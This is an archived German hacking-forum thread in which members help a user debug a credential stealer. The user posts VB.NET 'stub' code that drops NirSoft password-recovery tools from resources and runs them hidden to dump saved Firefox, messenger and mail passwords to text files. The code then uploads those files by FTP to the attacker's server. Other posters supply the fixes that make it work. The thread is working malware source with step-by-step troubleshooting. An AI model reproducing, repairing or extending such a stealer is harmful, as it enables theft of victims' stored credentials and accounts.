PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : passwörter.txt konnte nicht gefunden werden



inmate
29.03.2009, 13:09
Hallo :)
ich habe da ein problem mit meinem stealer , also: ich lasse ja die nirsoft tools als ressource droppen.

mit meinem stealer ging das ja auch als ich 1 nirsoft tool hatte.
jetzt habe ich 3 nirsoft tools und jetzt zeigt er mir immer an das C:\windows\passwörter.txt nicht gefunden werden konnte. ich bin mir eigentlich zu 100% sicher das der code stimmt doch irgendwie will das nicht gehen.
muss ich zwischen den uploads noch sleep machen ???

also ich lasse die .txt dokumente in 4 verschiedenen uploaden .

DarkFire
29.03.2009, 13:12
Auf Vista muss die Datei(dein Stealer) als Admin ausgeführt werden sonst wird keine "passwörter.txt" erstellt.

!Neolution!
29.03.2009, 13:30
Auf Vista muss die Datei(dein Stealer) als Admin ausgeführt werden sonst wird keine "passwörter.txt" erstellt.

So ist es. :D
Liegt aber auch am verzeichnis ... in dem fall (C:\windows\passwörter.txt) werden adminrechte benötigt im gegensatz zu .. z.B. Desktop oder Eigene Dateien/Documents ... (bei vista der benutzername)

Die besagte technik bei vista nennt sich User Account Protection die dafür sorgt das prozesse standardmäßig ohne adminrechte gestartet werden.

Versuchs mal so



Imports System.Security

//....

Private Sub BspButton_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnRun.Click

StartNewProcessWithAdminCredentials("C:\Windows\passwörter.txt")

End Sub

//...



habs jetzt net getestet weil kein vb.net zur hand
viel glück...

!Neolution!

inmate
29.03.2009, 14:16
ich habe aber kein vista ^^

snify
29.03.2009, 14:19
Auf Vista muss die Datei(dein Stealer) als Admin ausgeführt werden sonst wird keine "passwörter.txt" erstellt.


Falsch! Aber egal :P
Ein Prozess benötigt keine Admin-Rechte, um mal eben eine normale passwort.txt zu erstellen. (es sei denn Linux... o.ä.)
Schau mal auf meine Stealer. Die laufen auch unter Vista ohne das als admin auszuführen...

@Threadstarter
Wann und wo kommt die Meldung? von Nirsoft? schau mal, dass du mit Umgebungsvariablen arbeitest oder deine passwort.txt erstmal woanders (auf C:\) erstellst/droppst...

inmate
29.03.2009, 14:40
stimmt gute idee sniffy , danke werds mal probieren :)

EDIT://also irgendwie geht das nicht er droppt zwar auf C: doch er erstellt keine PW.txt -.-

woran könnte das den liegen :/

snify
29.03.2009, 15:07
probiers mal nur mit der Dos-Konsole
also Start --> ausführen --> cmd ---> C:\nirsoft.exe /stext C:\passwort.txt

Wichtig sind die Parameter und die Pfadangaben mit Backslash und Schrägstich.
Vielleicht liegt dort dein Fehler...

Runner
29.03.2009, 15:36
Ich hatte das ungefähr gleich problem, nur das der stealer die txt datei nicht produzieren konnte. Alle Sicherheitssoftware war im selbsttest ausgeschaltet inklusiefe firewall, aber es kam manchmal eine fehlermeldung oder die textdatei wurde nicht erzeugt. Und das ist bei fast allen stealern so gewesen. mfg

snify
29.03.2009, 15:39
Also bei mir funktioniert alles reibungslos.
Versuch mal (kp wie das in VB ist) ne Shell zu starten mit cmd \c "nirsoft.exe /stext C:\test.txt"
Vielleicht kannst du ein Code-Ausschnitt etc. zu posten?!

inmate
29.03.2009, 15:55
so hier der von meiner stub:
If fake = True Then
MessageBox.Show(text, titel, MessageBoxButtons.OK, MessageBoxIcon.Error)

End If

If fire = True Then
Dim ressource1() As Byte = My.Resources.PasswordFox
FileOpen(1, ("C:\fox.exe"), OpenMode.Binary)
FilePut(1, ressource1)
FileClose(1)
Shell("C:\fox.exe /stext" & "C:\passworteneu.txt", AppWinStyle.Hide)

End If
If mess = True Then
Dim ressource2() As Byte = My.Resources.mspass
FileOpen(1, ("C:\mspasss.exe"), OpenMode.Binary)
FilePut(1, ressource2)
FileClose(1)
Shell("C:\mspasss.exe /stext" & "C:\passworter.txt", AppWinStyle.Hide)


End If
If mail = True Then
Dim ressource3() As Byte = My.Resources.mailpv
FileOpen(1, ("C:\mailsss.exe"), OpenMode.Binary)
FilePut(1, ressource3)
FileClose(1)
Shell("C:\mailsss.exe /stext" & "C:\passwortes.txt", AppWinStyle.Hide)

End If

If fire = True Then
My.Computer.Network.UploadFile("C:\passworteneu.txt", "ftp://" & FTP & "/" & "firefoxpws.dat", user, pass)
End If
If steam = True Then
My.Computer.Network.UploadFile("C:\passwortealt.txt", "ftp://" & FTP & "/" & "steamwps.dat", user, pass)
End If
If mess = True Then
My.Computer.Network.UploadFile("C:\passworter.txt", "ftp://" & FTP & "/" & "outlookpws.dat", user, pass)
End If
If mail = True Then
My.Computer.Network.UploadFile("C:\passwortes.txt", "ftp://" & FTP & "/" & "mailpws.dat", user, pass)
End If
Me.Close()



End Sub

End Class

snify
29.03.2009, 16:25
Shell("C:\fox.exe /stext" & "C:\passworteneu.txt", AppWinStyle.Hide)
Arbeite hier mal mit Leerzeichen also:
Shell("C:\fox.exe /stext" & " C:\passworteneu.txt", AppWinStyle.Hide)
oder einfach
Shell("C:\fox.exe /stext C:\passworteneu.txt", AppWinStyle.Hide)

Und lass mal die Datei erstmal original. Kenn mich zwar nicht mit VB aus, aber ich seh irgendwas mit Ressourcen. Also die Dateien mal original lassen. Probier deine fox.exe oder ähnliches ohne VB Script sondern direkt in Windows mal ansprechen. Falls das auch nicht geht, dann nochmal downloaden (vielleicht Downloadfehler)

Sonst kann ich dir glaube ich nicht mehr helfen :(

Sirect
29.03.2009, 16:28
Mach noch ...AppWinStyle.Hide,WaitToComplete

inmate
29.03.2009, 17:06
GROSSES DANKE euch beiden :)

funzt wunderbar :)

!Neolution!
29.03.2009, 17:07
Falsch! Aber egal :P
Ein Prozess benötigt keine Admin-Rechte, um mal eben eine normale passwort.txt zu erstellen. (es sei denn Linux... o.ä.)
Schau mal auf meine Stealer. Die laufen auch unter Vista ohne das als admin auszuführen...

Haha, ein profi! xD

Ja, wenn du es so gut weisst, dann kopier doch mal unter vista eine .txt datei in das am anfang von inmate gepostete verzeichniss "C:\Windows\" .. und schau was für eine meldung auftaucht :eek: xD

DarkFire´s aussage war schon richtig .. nur etwas ungenau ... ich hab ihn extra nochmal korrigiert ... hättest du mal meinen post gelesen wüsstest dus ...



Liegt aber auch am verzeichnis ... in dem fall (C:\windows\passwörter.txt) werden adminrechte benötigt im gegensatz zu .. z.B. Desktop oder Eigene Dateien/Documents ... (bei vista der benutzername)
Was sagt uns das?
Genau! ... Das dein kommentar unnötig war, und das du das nächste mal lieber 2x nachlesen solltest :D

Nix für ungut

!Neolution!